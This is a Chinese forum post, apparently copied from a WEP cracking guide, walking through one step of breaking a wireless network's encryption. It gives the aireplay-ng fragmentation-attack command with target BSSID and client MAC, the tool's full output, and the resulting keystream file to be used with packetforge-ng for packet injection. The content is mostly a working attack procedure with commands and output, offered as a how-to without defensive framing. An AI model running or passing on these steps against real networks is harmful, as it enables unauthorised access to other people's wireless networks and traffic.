- 论坛徽章:
- 0
|
这个需要多试验几次。
使用fragmentation attack 来获得PRGA(pseudo random genration algorithm)
这里的PRGA 并不是wep key 数据,并不能用来解密数据包,而是用它来产生一个新的
数据包以便我们在后面的步骤中进行注入。输入命令:wifiway:~# aireplay‐ng ‐5 ‐b
00:90:96:00:00:01 ‐h 00:11:22:33:44:55 wifi0
‐5 告诉aireplay‐ng 使用fragmentation attack 模式
‐b,‐h ,wifi0 就不用再解释了吧,呵呵。
系统将显示:
21:20:46 Waiting for a data packet...
Size: 78, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:90:96:00:00:01
Dest. MAC = 01:80:C2:00:00:00
Source MAC = 00:90:96:00:00:01
0x0000: 0842 0000 0180 c200 0000 0090 9600 0001 .B..............
0x0010: 0090 9600 0001 b013 b66d a100 fbd7 4289 .........m....B.
0x0020: d814 0d6c 9570 c61a 0d38 3034 dc48 3e9f ...l.p...804.H>.
0x0030: 273d 2fed c2b7 0991 2557 5c32 aae1 a2fd '=/.....%W\2....
0x0040: 855a 3bbb 5f7f 74ae 1850 2503 bd2f .Z;._.t..P%../
Use this packet ? y(在这里请输入y 表示使用这个包)
中国无线门户
Anywhere WLAN!! 29
Saving chosen packet in replay_src-1104-212046.cap(保存了一个cap 文件,但并不
能用来破解)
21:20:55 Data packet found!
21:20:55 Sending fragmented packet
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
21:20:55 Trying to get 384 bytes of a keystream
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
21:20:55 Trying to get 1500 bytes of a keystream
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
Saving keystream in fragment-1104-212055.xor(生成了一个xor 文件)
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
这一步生成的xor 文件将被我们用来产生arp 数据包,如果你选的包不成功,请多试几
次。 |
|